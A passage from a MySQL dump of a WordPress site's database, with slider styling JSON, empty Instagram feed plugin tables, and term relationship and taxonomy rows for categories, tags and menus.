argin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"15px\",\"e\":true},\"n\":{\"v\":\"15px\",\"e\":true},\"t\":{\"v\":\"15px\",\"e\":true},\"m\":{\"v\":\"15px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"1px\",\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(4,8,'[]','[]','{\"version\":\"6.1.6\"}'),(5,15,'[]','','{\"temp\":true}'),(6,12,'[]','','{\"temp\":true}'),(7,16,'{\"static\":{\"isstatic\":true},\"runtime\":{\"collapsedGroups\":[]},\"title\":\"Global Layers\",\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]}}','{\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0}}}','{\"version\":\"6.1.8\"}'),(8,17,'[]','','{\"temp\":true}'),(9,18,'[]','','{\"temp\":true}'); /*!40000 ALTER TABLE `wpvt_revslider_static_slides_bkp` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_sbi_feed_caches` -- DROP TABLE IF EXISTS `wpvt_sbi_feed_caches`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_sbi_feed_caches` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `feed_id` varchar(255) NOT NULL DEFAULT '', `cache_key` varchar(255) NOT NULL DEFAULT '', `cache_value` longtext NOT NULL DEFAULT '', `cron_update` varchar(20) NOT NULL DEFAULT 'yes', `last_updated` datetime NOT NULL, PRIMARY KEY (`id`), KEY `feed_id` (`feed_id`(191)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_sbi_feed_caches` -- LOCK TABLES `wpvt_sbi_feed_caches` WRITE; /*!40000 ALTER TABLE `wpvt_sbi_feed_caches` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_sbi_feed_caches` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_sbi_feeds` -- DROP TABLE IF EXISTS `wpvt_sbi_feeds`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_sbi_feeds` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `feed_name` text NOT NULL DEFAULT '', `feed_title` text NOT NULL DEFAULT '', `settings` longtext NOT NULL DEFAULT '', `author` bigint(20) unsigned NOT NULL DEFAULT 1, `status` varchar(255) NOT NULL DEFAULT '', `last_modified` datetime NOT NULL, PRIMARY KEY (`id`), KEY `author` (`author`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_sbi_feeds` -- LOCK TABLES `wpvt_sbi_feeds` WRITE; /*!40000 ALTER TABLE `wpvt_sbi_feeds` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_sbi_feeds` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_sbi_instagram_feed_locator` -- DROP TABLE IF EXISTS `wpvt_sbi_instagram_feed_locator`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_sbi_instagram_feed_locator` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `feed_id` varchar(50) NOT NULL DEFAULT '', `post_id` bigint(20) unsigned NOT NULL, `html_location` varchar(50) NOT NULL DEFAULT 'unknown', `shortcode_atts` longtext NOT NULL, `last_update` datetime DEFAULT NULL, PRIMARY KEY (`id`), KEY `feed_id` (`feed_id`), KEY `post_id` (`post_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_sbi_instagram_feed_locator` -- LOCK TABLES `wpvt_sbi_instagram_feed_locator` WRITE; /*!40000 ALTER TABLE `wpvt_sbi_instagram_feed_locator` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_sbi_instagram_feed_locator` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_sbi_instagram_feeds_posts` -- DROP TABLE IF EXISTS `wpvt_sbi_instagram_feeds_posts`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_sbi_instagram_feeds_posts` ( `record_id` int(11) unsigned NOT NULL AUTO_INCREMENT, `id` int(11) unsigned NOT NULL, `instagram_id` varchar(1000) NOT NULL DEFAULT '', `feed_id` varchar(1000) NOT NULL DEFAULT '', `hashtag` varchar(1000) NOT NULL DEFAULT '', PRIMARY KEY (`record_id`), KEY `hashtag` (`hashtag`(191)), KEY `feed_id` (`feed_id`(191)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_sbi_instagram_feeds_posts` -- LOCK TABLES `wpvt_sbi_instagram_feeds_posts` WRITE; /*!40000 ALTER TABLE `wpvt_sbi_instagram_feeds_posts` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_sbi_instagram_feeds_posts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_sbi_instagram_posts` -- DROP TABLE IF EXISTS `wpvt_sbi_instagram_posts`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_sbi_instagram_posts` ( `id` int(11) unsigned NOT NULL AUTO_INCREMENT, `created_on` datetime DEFAULT NULL, `instagram_id` varchar(1000) NOT NULL DEFAULT '', `time_stamp` datetime DEFAULT NULL, `top_time_stamp` datetime DEFAULT NULL, `json_data` longtext NOT NULL DEFAULT '', `media_id` varchar(1000) NOT NULL DEFAULT '', `sizes` varchar(1000) NOT NULL DEFAULT '', `aspect_ratio` decimal(4,2) NOT NULL DEFAULT 0.00, `images_done` tinyint(1) NOT NULL DEFAULT 0, `last_requested` date DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_sbi_instagram_posts` -- LOCK TABLES `wpvt_sbi_instagram_posts` WRITE; /*!40000 ALTER TABLE `wpvt_sbi_instagram_posts` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_sbi_instagram_posts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_sbi_sources` -- DROP TABLE IF EXISTS `wpvt_sbi_sources`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_sbi_sources` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `account_id` varchar(255) NOT NULL DEFAULT '', `account_type` varchar(255) NOT NULL DEFAULT '', `privilege` varchar(255) NOT NULL DEFAULT '', `access_token` varchar(1000) NOT NULL DEFAULT '', `username` varchar(255) NOT NULL DEFAULT '', `info` text NOT NULL DEFAULT '', `error` text NOT NULL DEFAULT '', `expires` datetime NOT NULL, `last_updated` datetime NOT NULL, `author` bigint(20) unsigned NOT NULL DEFAULT 1, PRIMARY KEY (`id`), KEY `account_type` (`account_type`(191)), KEY `author` (`author`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_sbi_sources` -- LOCK TABLES `wpvt_sbi_sources` WRITE; /*!40000 ALTER TABLE `wpvt_sbi_sources` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_sbi_sources` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_term_relationships` -- DROP TABLE IF EXISTS `wpvt_term_relationships`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_term_relationships` ( `object_id` bigint(20) unsigned NOT NULL DEFAULT 0, `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0, `term_order` int(11) NOT NULL DEFAULT 0, PRIMARY KEY (`object_id`,`term_taxonomy_id`), KEY `term_taxonomy_id` (`term_taxonomy_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_term_relationships` -- LOCK TABLES `wpvt_term_relationships` WRITE; /*!40000 ALTER TABLE `wpvt_term_relationships` DISABLE KEYS */; INSERT INTO `wpvt_term_relationships` (`object_id`, `term_taxonomy_id`, `term_order`) VALUES (668,22,0),(668,26,0),(668,29,0),(668,30,0),(722,22,0),(722,23,0),(722,26,0),(722,29,0),(722,30,0),(733,22,0),(733,25,0),(733,26,0),(733,27,0),(733,28,0),(733,87,0),(753,22,0),(753,24,0),(753,26,0),(753,29,0),(753,30,0),(753,88,0),(762,22,0),(762,26,0),(762,29,0),(762,30,0),(781,22,0),(781,26,0),(781,29,0),(781,30,0),(781,89,0),(825,22,0),(825,26,0),(825,29,0),(825,30,0),(825,90,0),(844,22,0),(844,26,0),(844,29,0),(844,30,0),(844,91,0),(875,18,0),(875,26,0),(875,29,0),(875,30,0),(902,18,0),(902,26,0),(902,29,0),(902,30,0),(910,18,0),(910,26,0),(910,29,0),(910,30,0),(996,21,0),(996,26,0),(996,29,0),(996,30,0),(1002,21,0),(1002,26,0),(1002,29,0),(1002,30,0),(1006,21,0),(1006,26,0),(1006,29,0),(1006,30,0),(1011,16,0),(1011,26,0),(1011,29,0),(1011,30,0),(1015,16,0),(1015,26,0),(1015,29,0),(1015,30,0),(1019,16,0),(1019,26,0),(1019,29,0),(1019,30,0),(1030,19,0),(1030,26,0),(1030,29,0),(1030,30,0),(1033,19,0),(1033,23,0),(1033,26,0),(1033,29,0),(1033,30,0),(1037,19,0),(1037,26,0),(1037,29,0),(1037,30,0),(1080,2,0),(5435,92,0),(1080,33,0),(1080,37,0),(1080,38,0),(1080,46,0),(1095,2,0),(5486,114,0),(1095,33,0),(1095,37,0),(1095,38,0),(1095,47,0),(1096,2,0),(5435,100,0),(1096,33,0),(1096,37,0),(1096,38,0),(1096,48,0),(1097,2,0),(5435,102,0),(1097,33,0),(1097,37,0),(1097,38,0),(1097,49,0),(1098,2,0),(5472,109,0),(1098,33,0),(1098,37,0),(1098,38,0),(1098,47,0),(1099,2,0),(5472,108,0),(1099,33,0),(1099,37,0),(1099,38,0),(1099,47,0),(1100,2,0),(5435,101,0),(1100,33,0),(1100,37,0),(1100,38,0),(1100,48,0),(1102,2,0),(5446,94,0),(1102,31,0),(1102,35,0),(1102,36,0),(1102,42,0),(1102,49,0),(1103,2,0),(1103,33,0),(1103,37,0),(1103,38,0),(1103,50,0),(1104,2,0),(5464,94,0),(1104,33,0),(1104,37,0),(1104,38,0),(1104,46,0),(1105,2,0),(5473,111,0),(1105,33,0),(1105,37,0),(1105,38,0),(1105,48,0),(1106,2,0),(5459,94,0),(1106,33,0),(1106,34,0),(1106,37,0),(1106,38,0),(1106,49,0),(1107,2,0),(5472,101,0),(1107,33,0),(1107,37,0),(1107,38,0),(1107,50,0),(1108,2,0),(5435,103,0),(1108,33,0),(1108,37,0),(1108,38,0),(1108,50,0),(1109,2,0),(5435,104,0),(1109,33,0),(1109,37,0),(1109,38,0),(1109,46,0),(1110,2,0),(5472,102,0),(1110,33,0),(1110,37,0),(1110,38,0),(1110,46,0),(1433,43,0),(1437,43,0),(1438,43,0),(1440,43,0),(1442,43,0),(1444,43,0),(1459,43,0),(1463,43,0),(1474,43,0),(1538,43,0),(1539,43,0),(1540,43,0),(1541,43,0),(1542,43,0),(1543,43,0),(1544,43,0),(1545,43,0),(1546,43,0),(1610,45,0),(1644,44,0),(1651,32,0),(1787,52,0),(1787,53,0),(1788,53,0),(1789,52,0),(1790,41,0),(1790,51,0),(1791,53,0),(1792,53,0),(1793,51,0),(1794,41,0),(1794,53,0),(1795,51,0),(1796,52,0),(1797,41,0),(1797,51,0),(1798,51,0),(1799,51,0),(1799,52,0),(1800,52,0),(1800,53,0),(1801,41,0),(1801,52,0),(1802,51,0),(2070,20,0),(2070,26,0),(2070,29,0),(2070,30,0),(2120,20,0),(2120,26,0),(2120,29,0),(2120,30,0),(2126,20,0),(2126,26,0),(2126,29,0),(2126,30,0),(2132,20,0),(2132,26,0),(2132,29,0),(2132,30,0),(2138,20,0),(2138,26,0),(2138,29,0),(2138,30,0),(2142,17,0),(2142,26,0),(2142,29,0),(2142,30,0),(2143,17,0),(2143,26,0),(2143,29,0),(2143,30,0),(2144,17,0),(2144,26,0),(2144,29,0),(2144,30,0),(2145,17,0),(2145,26,0),(2145,29,0),(2145,30,0),(2290,18,0),(2290,26,0),(2290,29,0),(2290,30,0),(2296,18,0),(2296,26,0),(2296,29,0),(2296,30,0),(3211,40,0),(3212,40,0),(3213,40,0),(3214,40,0),(3215,40,0),(3216,40,0),(3217,40,0),(3218,40,0),(4351,72,0),(4352,72,0),(4353,72,0),(4354,72,0),(4355,72,0),(4356,72,0),(4357,54,0),(4359,58,0),(4360,58,0),(4362,72,0),(4363,79,0),(4364,79,0),(4365,79,0),(4366,79,0),(4367,72,0),(4368,72,0),(4369,72,0),(4370,72,0),(4371,72,0),(4372,72,0),(4376,64,0),(4377,64,0),(4378,64,0),(4379,64,0),(4380,64,0),(4381,72,0),(4382,72,0),(4383,72,0),(4384,72,0),(4385,79,0),(4386,72,0),(4389,58,0),(4390,58,0),(4391,58,0),(4392,58,0),(4393,64,0),(4394,79,0),(4399,72,0),(4401,72,0),(4402,72,0),(4403,72,0),(4404,72,0),(4406,72,0),(4407,72,0),(4408,72,0),(4409,72,0),(4410,72,0),(4411,72,0),(4412,72,0),(4413,72,0),(4414,72,0),(4415,72,0),(4416,72,0),(4417,72,0),(4418,72,0),(4419,72,0),(4420,72,0),(4421,72,0),(4434,79,0),(4435,79,0),(4436,79,0),(4438,79,0),(4439,72,0),(4440,72,0),(4441,72,0),(4442,72,0),(4443,72,0),(4444,72,0),(4445,72,0),(4446,72,0),(4447,72,0),(4448,72,0),(4449,72,0),(4450,72,0),(4451,72,0),(4452,72,0),(4453,72,0),(4454,72,0),(4455,72,0),(4456,72,0),(4457,72,0),(4458,72,0),(4459,72,0),(4460,72,0),(4461,72,0),(4462,72,0),(4463,72,0),(4464,72,0),(4465,72,0),(4466,72,0),(4467,72,0),(4468,72,0),(4469,72,0),(4470,72,0),(4497,79,0),(4498,79,0),(4499,79,0),(4500,79,0),(4501,79,0),(4502,79,0),(4503,64,0),(4504,64,0),(4505,64,0),(4507,64,0),(4508,64,0),(4510,72,0),(4511,72,0),(4512,72,0),(4513,72,0),(4514,72,0),(4516,72,0),(4517,72,0),(4518,72,0),(4519,72,0),(4520,72,0),(4521,72,0),(4522,72,0),(4523,72,0),(4524,72,0),(4525,72,0),(4526,72,0),(4527,72,0),(4528,72,0),(4529,72,0),(4530,72,0),(4531,72,0),(4532,72,0),(4533,72,0),(4534,72,0),(4535,64,0),(4536,64,0),(4537,64,0),(4538,64,0),(4539,64,0),(4540,64,0),(4541,64,0),(4542,64,0),(4543,64,0),(4544,79,0),(4545,79,0),(4546,79,0),(4547,79,0),(4548,79,0),(4549,72,0),(4550,72,0),(4551,72,0),(4552,72,0),(4553,72,0),(4557,58,0),(4558,58,0),(4559,58,0),(4560,58,0),(4561,58,0),(4562,58,0),(4564,58,0),(4565,58,0),(4566,58,0),(4567,58,0),(4568,58,0),(4569,58,0),(4570,58,0),(4571,58,0),(4572,58,0),(4573,58,0),(4574,58,0),(4575,58,0),(4576,58,0),(4577,58,0),(4578,58,0),(4579,58,0),(4580,64,0),(4581,64,0),(4582,64,0),(4583,79,0),(4584,79,0),(4585,79,0),(4587,58,0),(4588,72,0),(4618,1,0),(4634,72,0),(4652,92,0),(4656,92,0),(4659,20,0),(4662,92,0),(4664,92,0),(4666,92,0),(4668,92,0),(4670,1,0),(4670,92,0),(4672,92,0),(4674,20,0),(4676,92,0),(4678,92,0),(4680,92,0),(4682,92,0),(4685,92,0),(4687,92,0),(4689,92,0),(4690,92,0),(4691,92,0),(4694,92,0),(4697,92,0),(4698,92,0),(4701,92,0),(4703,92,0),(4704,92,0),(4707,92,0),(4708,92,0),(4709,92,0),(4713,92,0),(4715,92,0),(4716,92,0),(4719,92,0),(4723,94,0),(4724,94,0),(4726,92,0),(4729,92,0),(4731,92,0),(4733,92,0),(4734,92,0),(4737,92,0),(4738,92,0),(4741,92,0),(4742,92,0),(4745,92,0),(4746,92,0),(4749,92,0),(4750,92,0),(4753,94,0),(4756,92,0),(4759,92,0),(4760,92,0),(4763,92,0),(4765,94,0),(4766,92,0),(4768,92,0),(4771,92,0),(4772,92,0),(4775,92,0),(4776,92,0),(4779,92,0),(4780,92,0),(4783,92,0),(4784,92,0),(4786,92,0),(4788,92,0),(4791,92,0),(4792,92,0),(4795,92,0),(4796,92,0),(4799,92,0),(4800,92,0),(4803,92,0),(4804,92,0),(4807,92,0),(4808,92,0),(4811,92,0),(4812,92,0),(4815,92,0),(4816,92,0),(4819,20,0),(4820,92,0),(4823,92,0),(4824,92,0),(4827,92,0),(4828,92,0),(4831,92,0),(4858,92,0),(5054,20,0),(5060,20,0),(5070,97,0),(5079,63,0),(5091,54,0),(5097,63,0),(5099,97,0),(5100,97,0),(5125,20,0),(5125,92,0),(5134,92,0),(5654,92,0),(5181,72,0),(5188,54,0),(5189,97,0),(5199,97,0),(5290,97,0),(5291,63,0),(5340,99,0),(5341,99,0),(5342,99,0),(5343,99,0),(5344,99,0),(5345,99,0),(5346,99,0),(5350,94,0),(5352,94,0),(5354,93,0),(5410,17,0),(5412,92,0),(5472,110,0),(5473,106,0),(5473,107,0),(5473,94,0),(5473,112,0),(5472,92,0),(5486,94,0),(5694,254,0),(5486,115,0),(5489,116,0),(5489,94,0),(5489,107,0),(5489,117,0),(5503,118,0),(5503,94,0),(5503,107,0),(5503,120,0),(5506,121,0),(5506,94,0),(5506,107,0),(5506,122,0),(5506,123,0),(5509,125,0),(5509,94,0),(5509,107,0),(5509,124,0),(5509,126,0),(5513,129,0),(5513,94,0),(5513,127,0),(5513,102,0),(5516,130,0),(5516,94,0),(5516,131,0),(5516,132,0),(5519,133,0),(5519,94,0),(5519,134,0),(5519,135,0),(5522,137,0),(5522,94,0),(5522,136,0),(5522,138,0),(5522,139,0),(5526,141,0),(5526,94,0),(5526,140,0),(5526,102,0),(5526,127,0),(5526,142,0),(5534,143,0),(5534,94,0),(5534,145,0),(5534,144,0),(5534,146,0),(5537,150,0),(5537,94,0),(5537,147,0),(5537,148,0),(5537,151,0),(5556,166,0),(5543,94,0),(5551,141,0),(5551,140,0),(5551,102,0),(5551,155,0),(5551,154,0),(5551,153,0),(5551,156,0),(5551,157,0),(5553,160,0),(5553,94,0),(5553,159,0),(5553,163,0),(5553,158,0),(5553,162,0),(5553,161,0),(5553,164,0),(5551,94,0),(5556,94,0),(5556,165,0),(5556,167,0),(5556,169,0),(5558,171,0),(5558,94,0),(5558,173,0),(5558,172,0),(5558,174,0),(5567,178,0),(5567,94,0),(5567,179,0),(5567,176,0),(5567,175,0),(5567,177,0),(5567,180,0),(5574,182,0),(5574,94,0),(5574,181,0),(5574,183,0),(5574,177,0),(5574,148,0),(5574,140,0),(5581,184,0),(5581,94,0),(5581,189,0),(5581,185,0),(5581,188,0),(5581,186,0),(5581,191,0),(5586,194,0),(5586,94,0),(5586,107,0),(5586,192,0),(5586,102,0),(5591,197,0),(5591,94,0),(5591,195,0),(5591,196,0),(5591,198,0),(5591,199,0),(5596,203,0),(5596,94,0),(5596,202,0),(5596,201,0),(5596,200,0),(5596,204,0),(5598,207,0),(5598,94,0),(5598,210,0),(5598,206,0),(5598,208,0),(5598,209,0),(5598,211,0),(5601,213,0),(5601,94,0),(5601,159,0),(5601,216,0),(5601,212,0),(5601,214,0),(5601,217,0),(5606,194,0),(5606,94,0),(5606,102,0),(5606,107,0),(5606,218,0),(5586,220,0),(5586,219,0),(5586,222,0),(5586,221,0),(5586,223,0),(5606,225,0),(5606,224,0),(5606,226,0),(5513,230,0),(5513,227,0),(5513,219,0),(5513,228,0),(5513,229,0),(5513,231,0),(5473,232,0),(5473,234,0),(5473,235,0),(5473,127,0),(5473,233,0),(5473,236,0),(5473,237,0),(5679,249,0),(5519,238,0),(5519,239,0),(5519,241,0),(5519,240,0),(5519,242,0),(5486,243,0),(5486,244,0),(5486,245,0),(5486,247,0),(5679,94,0),(5679,252,0),(5679,248,0),(5679,251,0),(5679,250,0),(5679,253,0),(5694,94,0),(5694,255,0),(5694,261,0),(5694,258,0),(5694,102,0),(5694,256,0),(5694,257,0),(5694,262,0),(5522,266,0),(5522,265,0),(5522,267,0),(5522,238,0),(5522,263,0),(5522,268,0),(5516,119,0),(5516,269,0),(5516,270,0),(5489,127,0),(5489,271,0),(5724,278,0),(5716,273,0),(5716,276,0),(5716,275,0),(5716,272,0),(5716,277,0),(5716,94,0),(5724,94,0),(5724,281,0),(5724,280,0),(5724,283,0),(5724,284,0),(5730,285,0),(5730,94,0),(5730,108,0),(5730,286,0),(5730,287,0),(5730,288,0),(5730,289,0),(5551,290,0),(5551,291,0),(5526,293,0),(5526,152,0),(5526,296,0),(5526,295,0),(5526,292,0),(5526,294,0),(5526,297,0),(5747,141,0),(5747,94,0),(5747,298,0),(5747,301,0),(5747,216,0),(5747,300,0),(5747,299,0),(5747,302,0),(5679,160,0),(5754,305,0),(5754,94,0),(5754,307,0),(5754,306,0),(5754,303,0),(5754,304,0),(5754,308,0),(5764,317,0),(5764,94,0),(5764,316,0),(5764,311,0),(5764,313,0),(5764,315,0),(5764,312,0),(5764,318,0),(5543,324,0),(5543,322,0),(5543,325,0),(5543,327,0),(5543,323,0),(5543,320,0),(5543,328,0),(5786,326,0),(5782,94,0),(5786,94,0),(5786,325,0),(5786,330,0),(5786,324,0); /*!40000 ALTER TABLE `wpvt_term_relationships` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_term_taxonomy` -- DROP TABLE IF EXISTS `wpvt_term_taxonomy`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_term_taxonomy` ( `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `term_id` bigint(20) unsigned NOT NULL DEFAULT 0, `taxonomy` varchar(32) NOT NULL DEFAULT '', `description` longtext NOT NULL, `parent` bigint(20) unsigned NOT NULL DEFAULT 0, `count` bigint(20) NOT NULL DEFAULT 0, PRIMARY KEY (`term_taxonomy_id`), UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`), KEY `taxonomy` (`taxonomy`) ) ENGINE=MyISAM AUTO_INCREMENT=332 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_term_taxonomy` -- LOCK TABLES `wpvt_term_taxonomy` WRITE; /*!40000 ALTER TABLE `wpvt_term_taxonomy` DISABLE KEYS */; INSERT INTO `wpvt_term_taxonomy` (`term_taxonomy_id`, `term_id`, `taxonomy`, `description`, `parent`, `count`) VALUES (1,1,'category','',0,2),(2,2,'product_type','',0,16),(3,3,'product_type','',0,0),(4,4,'product_type','',0,0),(5,5,'product_type','',0,0),(6,6,'product_visibility','',0,0),(7,7,'product_visibility','',0,0),(8,8,'product_visibility','',0,0),(9,9,'product_visibility','',0,0),(10,10,'product_visibility','',0,0),(11,11,'product_visibility','',0,0),(12,12,'product_visibility','',0,0),(13,13,'product_visibility','',0,0),(14,14,'product_visibility','',0,0),(15,15,'product_cat','',0,0),(16,16,'category','',0,3),(17,17,'category','',0,5),(18,18,'category','',0,5),(19,19,'category','',0,3),(20,20,'category','',0,11),(21,21,'category','',0,3),(22,22,'category','',0,8),(23,23,'post_tag','',0,2),(24,24,'post_tag','',0,1),(25,25,'post_tag','',0,1),(26,26,'post_tag','',0,31),(27,27,'post_tag','',0,1),(28,28,'post_tag','',0,1),(29,29,'post_tag','',0,30),(30,30,'post_tag','',0,30),(31,31,'product_tag','',0,1),(32,32,'events_category','',0,1),(33,33,'product_tag','',0,15),(34,34,'product_tag','',0,1),(35,35,'product_tag','',0,1),(36,36,'product_tag','',0,1),(37,37,'product_tag','',0,15),(38,38,'product_tag','',0,15),(39,39,'portfolio-category','',0,0),(40,40,'portfolio-category','',0,8),(41,41,'portfolio-category','',39,4),(42,42,'product_tag','',0,1),(43,43,'portfolio-category','',0,18),(44,44,'events_category','',0,1),(45,45,'events_category','',0,1),(46,46,'product_cat','',0,4),(47,47,'product_cat','',0,3),(48,48,'product_cat','',0,3),(49,49,'product_cat','',0,3),(50,50,'product_cat','',0,3),(51,51,'portfolio-category','',39,7),(52,52,'portfolio-category','',39,6),(53,53,'portfolio-category','',39,6),(54,54,'nav_menu','',0,3),(55,55,'nav_menu','',0,0),(58,59,'nav_menu','',0,29),(63,63,'nav_menu','',0,3),(64,64,'nav_menu','',0,23),(67,67,'nav_menu','',0,0),(68,68,'nav_menu','',0,0),(71,71,'nav_menu','',0,0),(72,72,'nav_menu','',0,103),(79,79,'nav_menu','',0,24),(83,83,'nav_menu','',0,0),(84,84,'nav_menu','',0,0),(87,87,'post_format','',0,1),(88,88,'post_format','',0,1),(89,89,'post_format','',0,1),(90,90,'post_format','',0,1),(91,91,'post_format','',0,1),(92,92,'category','',0,77),(93,93,'category','',94,1),(94,94,'category','',0,27),(95,95,'category','',0,0),(96,96,'category','',94,0),(97,97,'nav_menu','',0,6),(99,99,'nav_menu','',0,7),(100,100,'post_tag','',0,1),(101,101,'post_tag','',0,2),(102,102,'post_tag','',0,7),(103,103,'post_tag','',0,1),(104,104,'post_tag','',0,1),(105,105,'nav_menu','',0,0),(106,106,'post_tag','',0,1),(107,107,'post_tag','',0,4),(108,108,'post_tag','',0,2),(109,109,'post_tag','',0,1),(110,110,'post_tag','',0,1),(153,153,'post_tag','',0,1),(111,111,'post_tag','',0,1),(112,112,'post_tag','',0,1),(152,152,'post_tag','',0,1),(113,113,'post_tag','',0,0),(114,114,'post_tag','',0,1),(115,115,'post_tag','',0,1),(160,160,'post_tag','',0,1),(116,116,'post_tag','',0,1),(117,117,'post_tag','',0,1),(154,154,'